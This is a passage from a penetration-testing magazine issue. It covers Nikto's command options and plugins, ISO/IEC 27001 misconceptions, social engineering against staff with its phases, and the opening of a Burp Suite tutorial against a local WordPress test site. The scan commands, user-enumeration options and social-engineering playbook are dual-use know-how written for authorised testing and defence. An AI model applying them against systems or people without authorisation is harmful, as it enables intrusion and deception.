this is used. The scheme is: nikto_HOSTNAME_ PORT_TIMESTAMP.FORMAT For ‘-Format msf’ the output option takes special meaning. It should contain the password and location of the Metasploit RPC service. For example, it may look like: -o msf:<password>@ http://localhost:55553/RPC2.
-Plugins
Select which plugins will be run on the specified targets. A semi-colon separated list should be provided which lists the names of the plugins. The names can be found by using -list-plugins. There are two special entries: @@ALL, which specifies all plugins shall be run and @@NONE, which specifies no plugins shall be run. The default is @@DEFAULT.
-port
TCP port(s) to target. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80, 88, 90). If not specified, port 80 is used.
-Tuning
Tuning options will control the test that Nikto will use against a target. By default, all tests are performed. If any options are specified, only those tests will be performed. If the “x” option is used, it will reverse the logic and exclude only those tests. Use the reference number or letter to specify the type, multiple may be used: 0 – File Upload 1 – Interesting File / Seen in logs 2 – Misconfiguration / Default File 3 – Information Disclosure 4 – Injection (XSS/Script/HTML) 5 – Remote File Retrieval – Inside Web Root 6 – Denial of Service 7 – Remote File Retrieval – Server Wide 8 – Command Execution / Remote Shell 9 – SQL Injection a – Authentication Bypass b – Software Identification c – Remote Source Inclusion x – Reverse Tuning Options (i.e., include all except specified)
-Pause
Seconds (integer or floating point) to delay between each test.
The given string will be parsed from left to right, any x characters will apply to all characters to the right of the character.
-root
-Userdbs
Prepend the value specified to the beginning of every request. This is useful to test applications or web servers which have all of their files under a certain directory.
-ssl
Only test SSL on the ports specified. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first.
-Save
Save request/response of findings to this directory. Files are plain text and will contain the raw request/ response as well as JSON strings for each. Use a “.” to auto-generate a directory name for each target. These saved items can be replayed by using the included replay.pl script, which can route items through a proxy.
-timeout
Seconds to wait before timing out a request. Default timeout is 10 seconds. OPEN 01/2013
Load user defined databases instead of standard databases. User defined databases follow the same syntax as the standard files, but are prefixed with a ‘u’, e.g., ‘udb_tests’. all – Disable all standard databases and load only user databases. tests – Disable db_tests and load udb_tests. All other databases are loaded normally.
-until
Run until the specified time or duration, then pause. Durations in hours, minutes or seconds, like: 1h, 60m, 3600s. Times like “mm dd hh:mm:ss” (mm, dd, ss optional): 12 1 22:30:00.
-update
Update the plugins and databases directly from cirt.net.
-useproxy
Use the HTTP proxy defined in the configuration file. The proxy may also be directly set as an argument.
Page 17
http://pentestmag.com
NIKTO -Version
Display the Nikto software, plugin and database versions.
-vhost
Specify the Host header to be sent to the target.
Mutation Techniques
A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be combined. • Test all files with all root directories. This takes each test and splits it into a list of files and directories. A scan list is then created by combining each file with each directory. • Guess for password file names. Takes a list of common password file names (such as “passwd”, “pass”, “password”) and file extensions (“txt”, “pwd”, “bak”, etc.) and builds a list of files to check for. • Enumerate user names via Apache (/~user type requests). Exploit a misconfiguration with Apache UserDir setups which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter. • Enumerate user names via cgiwrap (/cgi-bin/ cgiwrap/~user type requests). Exploit a flaw in cgiwrap which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter. • Attempt to brute force sub-domain names. This will attempt to brute force know domain names, it will assume the given host (without a www) is the parent domain. • Attempt to brute directory names. This is the only mutate option that requires a file to be passed in the -mutate-options parameter. It will use the given file to attempt to guess directory names. Lists of common directories may be found in the OWASP DirBuster project.
Display
By default only some basic information about the target and vulnerabilities is shown. Using the -Display parameter can produce more information for debugging issues. OPEN 01/2013
1 – Show redirects. This will display all requests which elicit a “redirect” response from the server. 2 – Show cookies received. This will display all cookies that were sent by the remote host. 3 – Show all 200/OK responses. This will show all responses which elicit an “okay” (200) response from the server. This could be useful for debugging. 4 – Show URLs which require authentication. This will show all responses which elicit an “authorization required” header. D – Debug Output. Show debug output, which shows the verbose output and extra information such as variable content. E – Display all HTTP errors. Show details for any HTTP error encountered. P – Print progress to STDOUT. Show status report to STDOUT during testing (interval set in nikto.conf). V – Verbose Output. Show verbose output, which typically shows where Nikto is during program execution. E – Error Output. Display all HTTP and communications errors, which show a lot of output on some servers.
Scan Tuning
Scan tuning can be used to decrease the number of tests performed against a target. By specifying the type of test to include or exclude, faster, focused testing can be completed. This is useful in situations where the presences of certain file types are undesired – such as XSS or simply “interesting” files. Test types can be controlled at an individual level by specifying their identifier to the -T (-Tuning) option. In the default mode, if -T is invoked only the test type(s) specified will be executed. For example, only the tests for “Remote file retrieval” and “Command execution” can performed against the target: If an “x” is passed to -T then this will negate all tests of types following the x. This is useful where a test may check several different types of exploit. For example: The valid tuning options are: 0 – File Upload. Exploits which allow a file to be uploaded to the target server.
Page 18
http://pentestmag.com
1 – Interesting File / Seen in logs. An unknown but suspicious file or attack that has been seen in web server logs (note: if you have information regarding any of these attacks, please contact CIRT, Inc.). 2 – Misconfiguration / Default File. Default files or files which have been misconfigured in some manner. This could be documentation, or a resource which should be password protected. 3 – Information Disclosure. A resource which reveals information about the target. This could be a file system path or account name. 4 – Injection (XSS/Script/HTML). Any manner of injection, including cross site scripting (XSS) or content (HTML). This does not include command injection. 5 – Remote File Retrieval – Inside Web Root. Resource allows remote users to retrieve unauthorized files from within the web server’s root directory. 6 – Denial of Service. Resource allows a denial of service against the target application, web server or host (note: no intentional DoS attacks are attempted). 7 – Remote File Retrieval – Server Wide. Resource allows remote users to retrieve unauthorized files from anywhere on the target. 8 – Command Execution / Remote Shell. Resource allows the user to execute a system command or spawn a remote shell. 9 – SQL Injection. Any type of attack which allows SQL to be executed against a database. a – Authentication Bypass. Allows client to access a resource it should not be allowed to access. b – Software Identification. Installed software or program could be positively identified. c – Remote source inclusion. Software allows remote inclusion of source code. x – Reverse Tuning Options. Perform exclusion of the specified tuning type instead of inclusion of the specified tuning type.
gram better suited to replay and resend attacks (Figure 6).
Plugin selection
From Nikto 2.1.2 plugins can be selected on an individual basis and may have parameters passed to them. A plugin selection string may be passed on the command line through the -Plugin parameter. It consists of a semi-colon separated list of plugin names with option parameters placed in brackets. In simple form a plugin statement is like: plugin-name[(parameter name[:parameter value ] [,other parameters] )]
The parameters and plugin names can be found be running: Figure 7. This also means that we deprecate the mutate options and replace them with parameters passed to plugins, so the mutate options now internally translate to:
Figure 6. Replaying Saved requests
Replay Saved Requests
When using the Save functionality (-Save), findings requests are saved in text files. While these files contain human readable text, they also contain JSON representations of the request and response. This JSON request can be replayed by using the “replay.pl” script. The replay.pl reads and parses a saved file via the -file option, and can optionally run the request through a proxy, such as Burp. This will allow further exploration of vulnerabilities in a proOPEN 01/2013
Figure 7. Listing available Plug-in in Nikto
Page 19
http://pentestmag.com
NIKTO • tests(all) • tests(passfiles) • apacheusers(enumerate,home[,dictionary:dict. txt]) • apacheusers(enumerate,cgiwrap[,dictionary:di ct.txt]) • subdomain • dictionary(dictionary:dict.txt) Macros for commonly run plugin sets can also be defined in nikto.conf, the default ones are: @@MUTATE=dictionary;subdomain @@DEFAULT=@@ALL;-@@MUTATE;tests(report:500)
These are expanded by using -list-plugins and can be overridden through -Plugins. Altogether this can allow a customised set of plugins that may need to be run for a specific circumstance. For example if a normal test bought up that the server was vulnerable to the apache Expect header XSS attack and we want to run a test just to see that it is vulnerable by adding debugging, we can run:
cated in the templates directory. Variables are defined as #variable-name, and are replaced when the report is generated. The files htm_start.tmpl and htm_end.tmpl are included at the beginning and end of the report (respectively). The htm_ summary.tmpl also appears at the beginning of the report. The htm_host_head appears once for every host, and the htm_host_item.tmpl and htm_host_ im.tmpl appear once for each item found on a host and each “informational message” per host (respectively). All valid variables are used in these templates. Future versions of this documentation will include a list of variables and their meaning. The copyright statements must not be removed from the htm_end.tmpl without placing them in another of the templates. It is a violation of the Nikto licence to remove these notices.
nikto.pl -host target.txt -Plugins “apache_expect_ xss(verbose,debug)”
And then manually check the output to see whether it was truly vulnerable. It should be noted that reports are also plugins, so if you need to customize the plugin string and want an output, include the report plugin: nikto.pl -host targets.txt -Plugins “apacheusers(enumerate,dictionary:users.txt); report_xml” -output apacheusers.xml
Output and Reports Export Formats
Nikto allows output to be saved in a variety of formats, including text, CSV, HTML, XML, NBE and exporting to metasploit. When using -output, an output format may be specified with -Format. If no -Format is specified, Nikto will try to guess the format from the file extension. If Nikto cannot guess the file format then output will only be sent to stdout. The DTD for the Nikto XML format can be found in the ‘docs’ directory (nikto.dtd).
HTML and XML Customisation
HTML reports are generated from template files loOPEN 01/2013
Ankhorus
Ankhorus is a leading cyber security solution provider in India. Dealing in various verticals like banking and critical security.
Page 20
http://pentestmag.com
ISO 27001
4 misconceptions about ISO/IEC 27001 If you intend to implement ISO/IEC 27001, you donâ&#x20AC;&#x2122;t need to read this article. But if you have eventually quit of implementing this standard due to its alleged disadvantages, you need to read this article.
T
his article tries to deconstruct some of the misconceptions about ISO/IEC 27001. This security management standard is said to require the introduction of control activities into the normal business and IT operations, which consequently increases the workload and causes operational inefficiencies. To unravel these allegations, we will look at four issues, but first we´ll start by an opening question: does your organization actually needs ISO/IEC 27001?
Do you need (a structured) security management?
An organization with a low risk exposure and a non demanding legal environment may achieve a good level of security management without a structured approach. But an organization that has an increasing risk exposure (e.g. Bring your Own Device) and faces a changing security requirements needs a systematic approach to identify business and legal requirements, to understand how those requirements may be put in jeopardy by risks and how to control these risks by appropriate measures. However, in spite of the risk exposure and external factors, the most important driver for security is, obviously, the business. This is evident considering the fact that most part of the ISMS descriptions (almost 40%) are related to services provided OPEN 01/2013
to external customers (This data was based on a study of 126 ISMS scope descriptions, performed by the author in his dissertation. A full text version of the dissertation is available at http://hdl.handle. net/10071/661). Therefore, depending of the business, risk and environment, an organization may adopt a structured approach to plan, implement and verify if the organization has controls adequate to its risks, or in other words, an Information Security Management System (ISMS). Now, that we establish the concept of ISMS we may address its misconceptions.
An ISMS requires the adoption of hundreds of unnecessary controls
Contrarily to the presumption that compliance with ISO/IEC 27001 demands hundreds of controls, this standard only requires the implementation of a small group of measures and entrust the organizations the decision to implement or not most of the controls. ISO/IEC 27001 has two categories of measures: (a) mandatory requirements, deemed as fundamental for any management system and (b) selective safeguards, which are decided based on the assessment of the risks affecting the assets in the ISMS scope. The mandatory requirements, inherited from other management systems as ISO 9001, define
Page 22
http://pentestmag.com
the basic activities that support security management. These activities, which are illustrated in Figure 1, engage in interactions between each other. For example, the modification of the security policy, performed by the security planning process, or a change in the ISMS scope (e.g. a new asset in the scope) has to be tackled by the risk management process. If there is a significant change in the scope or in the security requirements, then a risk assessment should be performed. If the identified risk requires an adjustment of the existing controls, then the security measures must be adapted/ implemented accordingly. Consequently, the related documentation must be modified (addressed by the document and records process) and the employees informed and trained. Finally, the measurement of the control effectiveness, regular audits and incident management will provide input to the identification of improvements (through preventive and corrective action). The second type of requirement of ISO/IEC 27001 is selective safeguards. As seen in the Figure 1, all risks identified within the ISMS scope which are considered unacceptable by the organization have to be addressed by safeguards, which must be mapped against a catalogue of controls:
ISO/IEC 27002. ISO/IEC 27002, formerly known as ISO/IEC 17799 is a list of controls, structured in 11 domains and 133 controls, as seen in Figure 2. Therefore, there is no predefined number of measures that an organization must adopt to achieve the ISO/IEC 27001 certification. An organization has to implement the mandatory requirements and select from ISO/IEC 27002 the controls which are applicable to its identified risks.
Even with a small ISMS scope, an organization achieves a high level of security
One frequent misconception about ISO/IEC 27001 is the assumption that simply by having a confined area of the organization certified by ISO/IEC 27001, the entire organization has a high level of protection. ISO/IEC 27001 entitles organizations to restrict the application of the security management system to a particular area, as long as this area is core to the business, i.e. the assets and processes placed under the ISMS scope should be relevant to the organization business (e.g. mortgage loans in a retail bank). Despite this requirement of the business relevance of the scope, some organizations tend
Security Planning
R i s k
ISMS Scope P l a n
Assets related to a specific process or area in the organiza on
Controls mapped with ISO/IEC 27002
Operate Controls
I m p l e m e n t
M o n i t o r i n g
M a n a g e m e n t
Applicable safeguards
Control Documents and Records Train Human Resources
Measurement of Controls
Internal Audits
Incident Management
Improvement Follow-up
Figure 1. Information Security Management Systems (ISMS) OPEN 01/2013
Page 23
http://pentestmag.com
ISO 27001 to propose for certification areas which are more prone to be placed under management systems (e.g. organizational units with more stable activities, performed by unchanging resources and with clear interfaces with internal and external entities), but which possess less business importance. Nevertheless, the purpose sought by organizations in restricting the ISMS scope is not fully accomplished. Although, a ISMS applied to, instead of the entire organization, just a part of it, enables a reduction of the number of assets to be assessed by risk management, this reduction of effort does not occur in terms of implementation of controls, because some countermeasures (e.g. security awareness, configuration baselines for IT systems) to be effective, can only be implemented across the organization. Therefore, implementing the ISMS in a small organization scope may facilitate the initial implementation, but will limit the benefits of running an ISMS to a part of the organization, while maintaining the inherent costs of management its controls.
for the organization unit under the ISMS scope), it does not require dedicated employees.
An ISMS implies a additional workload for the business
Implementing an ISMS will require, in most organizations, the introduction of new countermeasures, new responsibilities and new documentation. The actual weight of running a security management system will depend, in part, of the way the system was developed in the organization. If the ISMS was implemented has a additional group of processes in relation to the normal business activities, then the system tends to work as a closed box, only opened when needed. But if the ISMS was developed to be part of the normal operations and consequently security activities are integrated into business processes (e.g. the activity of security planning and review is a regular topic in the agenda of the directors meetings), then the ISMS will be a valuable tool to increase the protection of the organization.
Some people argue that running a management system implies more control activities, which increases the normal workload and may even require dedicated employees (e.g. security officer). This assumption is not confirmed by several certified organizations. In one organization that the author participated in the ISMS implementation, the ISMS related activities did not represent, in average, more than 5% of the working time of employees. And even the employee who held the position of security officer didn’t had an occupation with the management of the ISMS larger than 20% of his working time. Consequently, although an ISMS demands new responsibilities (a new job function – security officer – and some new control activities, in particular, for the IT department and
An ISMS requires a supporting tool
A certified organization must produce records of its security activities for auditing purposes. These records should attest the Plan Do Check Act (PDCA) steps of the security processes: defining requirements based on risk assessments, planning the implementation of security measures, controlling them and evaluating its results. It is common believed that to support the PDCA activities an organization should be equipped with tools to automate the risk assessments and to enable a central repository of all security records and documents (e.g. security policies and procedures). This idea, however, is not corroborated by the standard, which actually does not mention the need for any supporting tool, providing to the organization the freedom to choose any instrument to manage its ISMS, as long as it is adequate to the size and complexity of the organization´s ISMS.
Conclusions
Security Policy Organizational Security Asset Management
Paulo Coelho
Control Access Human Resource Security
Physical and Environment Security
Incident Management
Business Continuity
Compliance Management
Figure 2. Domains of ISO/IEC 27002 OPEN 01/2013
Communications and Operations Acquis. development mainten. of systems
Paulo Coelho works in a Big Four consultancy firm, where he participated in several ISO/IEC 27001 projects. He holds several information security certifications (ISO/ IEC 27001 Lead Auditor, CISSP, CISA) and is a member of the Portuguese IT Security Normalization Commission (part of ISO structure). More information about him is available at http://www.linkedin.com/in/paulocoelho.
Page 24
http://pentestmag.com
ISO 27001
Testing Your Most Valuable Assets When thinking about Information Security, we can sometimes be forgiven for thinking that technology is the answer to all our security problems. Though a little rare in these later times, hardware and software products are often sold as the ‘silver bullet’ to solve all our security or compliance woes, but it’s actually ‘People’ who represent the core operating component of any business and therefore are both a very real threat and blessing to our infrastructure and its layered Information Security Management System.
I
t is therefore ‘people’ who are ultimately responsible for the success or failure of security in an organisation and it is they who need to be considered most within the scope of our security testing. In the case of trusted DBA’s for example, a business can have all the technical measures available in place, such as encryption, logging, application firewalling, robust access controls and a host of endpoint security, but a simple copy to a cheap USB storage device, shared access area or email out of the business can breach, undermine and lay to waste the best technical defences. In other words, businesses spend millions on technical isolation and protection which, with a £5 USB key can be maliciously or accidently bypassed and breached. It’s reasonably safe to say that we know that people are the most valuable and high risk assets that we have operating within your boundaries, so it should go without saying that we should also be aware that they are able to, at a seconds notice, circumvent security and compliance measures, ignore policy and compromise your business data with a press of a button either maliciously or by accident. To top this all off they are an asset that you cannot control or anticipate the failure of and are open to unknown external pressures that you OPEN 01/2013
cannot easily probe, measure, quantify and neatly audit. You may think this is a pessimistic, even fatalistic view, but this is not the case.
Page 26
http://pentestmag.com
As I sit here, I cannot think of one time in my career (and let’s just say it stretches back further than I care to remember!) where a human wasn’t directly or indirectly involved to some degree in any large scale breach or data loss. Furthermore, on the 90th birthday of George Blake who was arguably one of the most famous of double agents when he passed the names of some 40 MI6 agents to the Russians, many of whom were subsequently executed, we can no doubt recall news of some of the most secure military establishments leaking secrets to foreign powers. All breached by trusted and vetted individuals like Blake. So the purpose of this article is to highlight controls that are applicable to humans from a Risk Management perspective and to help you understand
the nature of humans, which is critically important to the security of information systems yet is one we technical security practitioners routinely ignore or overlook entirely.
Baseline
We are all here to ensure the confidentiality, integrity and availability of data and information. We can also say that we are also looking to ensure information and data authenticity, accountability in its use, non-repudiation and the security reliability of business assets, systems and processes. That all sounds good to me. As a basic premise all business should operate to standards such as ISO27001 with policies, risk management processes and tight security procedures in place across the whole enterprise.
Table 1. Human Threats: Threat-Source, Motivation, and Threat Actions from the NIST Special Publication 800-30 outlines that table in a slightly different manner but focuses on motivation as an addition to the normal process or risk calculations Vulnerability
Exploit or Advantage
Negligence
Not meeting multiple policy requirements. i.e.: Poor password use Poor system configuration Failure to maintain up to date AV pattern files Poor email and Internet usage Weak access control lists Transferring sensitive data without protection
Privilege escalations Virus or Malware infection Wireless breach due to weak access control and / or encryption
Power
Respect, concern or apprehension of management figures Worry about not meeting deadlines
Spoofing management to create, delete or modify accounts and system configs Password resets for irate or angry managers
Awareness
Weak system knowledge or use Unaware of correct actions Unsure how mandated or strict certain controls are No structure to security best practice or frameworks
Creating a ‘path of least resistance’ through a system Bypassing controls Degradation of controls Phishing Pharming and social engineering
Motivation (Lack Reduced or no incentive or drive to report weaknesof) ses No impetus for continual improvement No management backing or driving forces to support ideas or improve structures
Degradation of controls over time No reporting or action structure to alert to breach Increased risk of malicious or mischievous actions
Helpful
Bypass of controls Remove controls to help pass information quickly Do someone a favour
Tailgating (hold the door open for the person behind) Social engineering Bribery Critical information stored or transmitted in the clear or without due controls
Maliciousness
Wish to seek revenge on person or business Open to fraud or blackmail attempts Greed or self indulgence
Use of colleague credentials to commit fraud Wilful breach of systems Removal of data or information for next job Remove data for financial gain
Confidence
Overconfidence in system controls Under confidence in processes
Expectation that the any issue is ‘in hand’ Pride (not reporting or allowing a process to continue) Conceited approach that they know better
OPEN 01/2013
Page 27
http://pentestmag.com
ISO 27001 Of course we all know that a business can never be 100% secure and I’m sure you’ve seen and written some devastating reports in your time. We all know from experience too that what is written in the various security policies and standards is not necessary what is implemented in reality. As people represent some 60% of the operating system in terms of them being assets (ignoring the fact that they are users too), failure to successfully understand the working nature of these assets will ultimately raise the risk of and impact to the system.
The challenge Monetary gain Ego Economic espionage Rebellion Curiosity Illegal Information dis- Destruction of informaclosure tion Data alteration Competitive advantage Blackmail Exploitation Revenge Unintentional errors and omissions A few of my own that I’ve added through experience are: Defacement Kudos
Just for a laugh (for the ‘lulz’) Perceived Justice or attacking perceived injustices
Therefore Motivation is very important and key to how a vulnerability is exploited. Therefore motivation must clearly be added to any risk based process where employees or people form part of the operating procedure.
Social Engineering
The stand alone test that compliments the aspects of any technical pentest is the physical pentest. The key process to gaining most if not all of the information and data required for a successful physical penetration test is social engineering.
Human & Technical Vulnerabilities
Human Threats as defined by NISTS Special Publication 800-30 – Events that are either enabled by or caused by human beings, such as unintentional acts (inadvertent data entry) or deliberate actions (network based attacks, malicious software upload, unauthorized access to confidential information). Human vulnerabilities, defined here as personal shortcomings, carelessness, bad habits, maliciousness and certain behavioural attitudes to the world around us, can be easily linked to the multiple exploits of technical vulnerabilities to which we as security practitioners seek to eliminate. Though certainly not exhaustive, I have outlined certain personal and behavioural traits to technical and general security exploits. They are: OPEN 01/2013
Page 28
http://pentestmag.com
There are several definitions of social engineering, but it is essentially the act of obtaining information through deception. Like technical pentesting, it itself exploits a vulnerability in our own human nature – one such tendency is trust. As previously outlined we might pretend to be an employee seeking innocuous information, try to convince you that an exception to the rule is okay because of the urgency of the situation, or just act like he or she belongs somewhere he or she really shouldn’t be. Maybe surprisingly to some, the approach and methodology used to carry out a socially engineered physical pentest should closely follow that of a technical based penetration test.
Reconnaissance
Getting as much information about the business, its people or individual operations from internal knowledge or public websites such as their own website or social websites such as LinkedIn, Facebook and Twitter.
Scanning
Assessing and evaluating the people themselves and making notes about their character, how observant they are and their normal modes of operation such as their curiosity and helpfulness. Are they stressed in their job and therefore not paying full attention or even bothered what happens around them.
Gaining Access or Exploitation
This can be a building, facility, room or getting close (personally and spatially) to a person. This could be gaining trust or playing on traits such as kindness and helpfulness (social engineering) to help exploit any obvious vulnerability. Tailgating access and playing on peoples inherent trust of the individual behind or on their weakness to not challenge strangers.
Maintaining Access
A longer term process whereby a relationship is built and maintained to help preserve or obfuscate the exploit
Covering Your Tracks
The removal of all information that would or could lead to your real identity. This would include the backing up of fabricated stories with fake ‘evidence’. OPEN 01/2013
The defence from Social Engineering
As social engineering is an attack on human nature, there are no technical signatures that we can use to detect it or its influence on us. However there are various signals or pointers that give away areas of weakness within ourselves or the way we conduct ourselves or manage others. Some are briefly mentioned in the mapping table, however, Kevin Mitnick’s “Art of Deception,” outlines 6 tendencies of human nature that he used successfully and often as one of the earliest and most famous of ‘hackers’.
Authority
We have natural tendency to comply with figures of authority. For example, an attacker might persuade you to help by misrepresenting themselves as a fellow pentester, as an executive in the company or as an employee who supports an executive. In this process we easily fall foul of the natural need to unquestionably follow a directive for fear of some form of disloyalty.
Liking
We all have a tendency to help those we like or are bonded too in some way. So an attacker might try to convince us that they have something in common. Claiming, for example, to have similar interests, hobbies, beliefs, goals, attitudes or even hometowns.
Reciprocation
An excellent sales technique that can be employed help foster the wish to help those who have already done something to help them. This could come in the form of an attacker posing as a member of support staff who claims to have done something to protect you or your system. In return we are more likely to acquiesce to handing over or allowing something that can be exploited.
Consistency
We have a very strong in built tendency to comply when we have made a verbal or written promise or commitment to help. One example is that is being convinced to comply with a new company policy that states your password must be reset or set so that they can be easily guessed.
Social Validation
Another strong tendency is to unquestionably follow the examples of others. This has a knock on effect that effectively spreads the exploit like a virus.
Page 29
http://pentestmag.com
ISO 27001 Scarcity
This tendency covers greed; arrogance and simple competiveness when we are asked to comply when an object being sought is deemed valuable and attractive, in short supply, creates competition or is only available for a limited time (spot the sales technique again?). In this example, an email to company employees, claiming that the first person to reply will win something is a clear way of getting people to think about a positive result rather than the negative action they may be undertaking. Phishing sites use this to great effect by coaxing people to register or use a bogus website. In this way, usernames and passwords can easily be captured.
Solutions or Mitigation Strategies
Again, due to the non-technical nature of the attacks, the best defences are non-technical and rely upon personal interaction.
Like the pieces of a jigsaw puzzle, all the pieces should fit together neatly and they should all work for the common good. Therefore high quality, frequent awareness training and relevant, current and tailored security policies are the best way to defend against covert or overt social engineering. Through training and general awareness employees need to understand what social engineering is and how to respond to suspicious inquiries. It may sound obvious, but only through constant reminders and management support can employees be truly effective in identifying these types of OPEN 01/2013
attacks and respond appropriately. Mitnick’s attack vectors are as true today as they were in the 1970’s and 1980’s. It may seem like an uphill battle to work through our belief that ‘it will never happen to us’ but employees should be encouraged to maintain a defensive attitude and err on the side of caution when they answer the phone, respond to an email, or hold the door open for somebody. Security policies on the other hand establish solid and legal accountability and provide clear guidelines. In addition to publishing security policies, all employees should be trained to ensure they understand their role and how the policies apply to them. The policies should be tailored to suit. Employees should report potential security incidents and be given clear instructions on how to report that information. Employees also need to understand the consequences of violating these security policies. Security policies are for everyone to uphold, maintain and abide by. Not just IT. People should be reminded that they play a key role in the security of their organisation and that it is a shared responsibility. In conclusion, adding this physical pentest procedure to compliment the technical arsenal should really be seen as a valuable product addition. It also helps those of us in Security roles to remember that good Information Security is only as strong as the weakest link and although this is something which we hear time and time again, it is far too easy to forget that the weakest link is also the most important asset of all; People.
Alan Cook
Alan is an information security expert who served in the Military for over 23 years holding a Diplomatic Passport as data custodian. Alan then joined a Global bank and was the UK’s lead security officer before moving into the retail and gaming sector driving in regulatory frameworks such as ISO27001 and PCIDSS. Before joining the Agenci Alan was the Information Security Officer and Senior IT Auditor for a large, global gaming business with a major online and high street presence.
Page 30
http://pentestmag.com
SECURITY ARCHITECTS
www.InfoSecSkills.com/Careers
LEAD PRACTITIONER
Allow us to guide your CAREER
SENIOR PRACTITIONER
Are you a security expert with a penchant for teaching? Are you good at working with other people, maybe mentoring your peers? If so, have you ever considered yourself as a professional instructor? InfoSec Skills is looking for dedicated security professionals who want to enhance their career and earnings as a professional tutor, providing the support, infrastructure and remuneration for authors to create world-class e-learning and classroom based courses. If you are interested in learning more, get in touch: contact@infosecskills.com.
PRACTITIONER
BURP SUITE
Burp Suite
Automated and Manual Processes Used to Identify Vulnerabilities As most penetration testers know, there is no amount of automated tools that could replace a real life pentester. Sure, in our testing we use automated tools to assist and speed up the process, but when you really get down to it there is no substitution for doing it yourself. This article will go through some of the more commonly used components of the PortSwigger Burp Suite, looking at the automated and manual processes that can be used to identify vulnerabilities in web applications, and how to leverage both methods in order to get the most out of the Burp Suite.
U
nfortunately fully detailing all the components of the Burp Suite would require writing a full book. Luckily enough this has already been done for us, so in this article my intention is for you to have a practical understanding of some of the Burp Suites basic functionality by the time you finish reading. In order to get the most out of this article I would advise reading it while sitting in front of your computer, trying out the steps as you progress through the article. Throughout this article we will be using Burp Professional 1.5.rc3 with the Firefox 14.01 browser to attack an almost default installation of WordPress 3.4.2. I say almost because in order to make the testing a bit more realistic I have created a few users and published a few posts in order to give us something to work with. I’ve setup the WordPress install locally on my machine and gave it the name example.com which I have included in my hosts file. In order to get the most out of this test we’ll be taking a “black box” approach – that is we’ll be simulating having no prior knowledge of application!
Getting Burp
As mentioned earlier we’re using the professional edition of the Burp Suite for this article. While the free edition is quite useful for light testing, for serious penetration testing you will need the profesOPEN 01/2013
sional edition. Luckily enough you can request a free trial of the suite from www.portswigger.net so you can try before you buy.
Intro to Burp
So before we begin we should get to know Burp a bit better. Burp has several components which can be used for a variety of purposes including a proxy for intercepting and modifying traffic between our browser and the target application; a spider for crawling the applications we are testing; a web application scanner which will automatically detect many types of vulnerabilities; a repeater that dramatically cuts down the time involved in manipulating and sending multiple requests to an application; an intruder tool we can setup to run hundreds of attacks in quick succession to test application parameters, and finally a tool for testing application session tokens to determine the randomness of these tokens. As always it’s important to remember that tools such as the Burp Suite can be damaging to the applications you are testing and you should always have written permission from the owner of the site before you begin testing!
Getting started
When you open Burp you will be presented with a number of tabs at the top of the program. We’re
Page 32
http://pentestmag.com
going to begin by setting the scope of our testing by opening the Target->Scope tab at the top of the application as shown in Figure 1. Before we add in our target scope take a moment to look at the “Exclude from scope” section. This section is useful to exclude pages such as logoff or sign out pages which would otherwise kick you out of the application you are testing. To add a new application to our scope select the “Add” button from the “Include in scope” section. A new dialog box will pop up as per Figure 2 requesting further information on the scope of the testing. To include the application’s domain in scope enter your domain (in our case “example.com”) into the “Host or IP range” input box leaving the other fields at their default settings. Now we’ll set up a few things to make our experience a little more streamlined. Under the Target->Site Map tab select the filter at the top of the panel that contains the text “Filter: Hiding not found items….”. In order to filter out unwanted items from the Site map tab we’ll need to tick the checkbox beside “Show only in-scope items” – this will just ensure that the site map is nice and tidy when we are viewing it. Now we’ll just do some basic setup of the Burp Scanner. Go the Scanner tab and select the Live Scanning sub tab as shown in Figure 3. We want to
make sure that “Live Active Scanning” is set to “Use suite scope” as otherwise we risk the scanner automatically testing sites outside the scope of our test which could land us in trouble with the owners of these out of scope sites. It is important to be aware that “Live Active Scanning” can be quite dangerous as it will take any base request to an application and automatically insert attack strings into discovered parameters which are then sent to the application. As a result of this, if left unchecked there is a risk that the scanner could damage an application, submit hundreds of forms or send hundreds of emails. Before moving on make sure that the “Live Passive Scanning” is also set to “Use suite scope”. Passive scanning won’t send any new request to the application but rather analyzes the content of responses received while browsing an application. We won’t be using Burp’s Spider functionality for this test so it’s best to turn it off completely as we don’t want it running wild increasing the number of discovered pages and therefore the number of pages the active scanner will process. To make sure it’s disabled browse to the Spider->Control tab and ensure sure the spider is paused.
Configuring the proxy
The browser you use to begin testing with doesn’t really matter all that much. To be sure you’ve caught everything you’ll most likely need to use a combination of different browsers. For the purposes of this article however we’ll just stick with Firefox. In order to have our traffic proxied through
Figure 1. Target scope
Figure 3. Live scanning options
Figure 2. Adding a new target OPEN 01/2013
Figure 4. Proxy listeners Page 33
http://pentestmag.com
BURP SUITE Burp we’ll need to open Firefox and change our proxy settings to use http://localhost:8080. This is the default listening address and port combination that Burp uses for its intercepting proxy (see Figure 4) which should have started listening when we started Burp. If you get connection refused errors when trying to proxy through Burp check the settings under the Proxy->Options to see which Proxy listeners are running. You can add more than one proxy listener if desired but for now we’re just going to stick with the default. The final task before we being testing is to turn on Intercepting. We turn this on under the Proxy-> Intercept by clicking the button labeled “Intercept is off”. When the proxy is intercepting this button should read “Intercept is on”.
Mapping and scanning the application
Now we can finally begin our penetration testing. To begin we simply put in our URL into our address bar in Firefox. If the previous steps have all been completed successfully then our Burp instance should capture and hold the request. If we now browse to the Proxy->Intercept tab we should find an http request waiting for us. This first request is just the initial request for connecting to the site and
can be allowed through. To let it do so just click the Forward button as shown in Figure 5. The first thing we’re going to want to do now that we’ve confirmed everything is working is to turn off intercepting and browse the application. We want to get an idea of the applications layout and have this data available to Burp. As we browse the application Burp will begin to add discovered pages to its scanner so be careful of submitting forms. If you are working on a live application then there is a chance of this function causing significant harm to the application so you should keep an eye on it, checking the Scanner->Scan Queue tab often to review which pages are scheduled to be scanned. It is important to inspect any entries in the list that might result in dangerous form submissions and remove them before it happens! While it is dangerous to leave the scanner unchecked it can be incredibly useful when testing for different types of common application issues. In this particular case we are testing a development site that we can scan with impunity so we can submit forms and comments as required and test with the scanner. The scanner will have already picked up on some issues as you’ve browsed through the site so if you look under the Scanner->Results tab you should see something similar to that shown in Figure 6.
Paying attention to detail
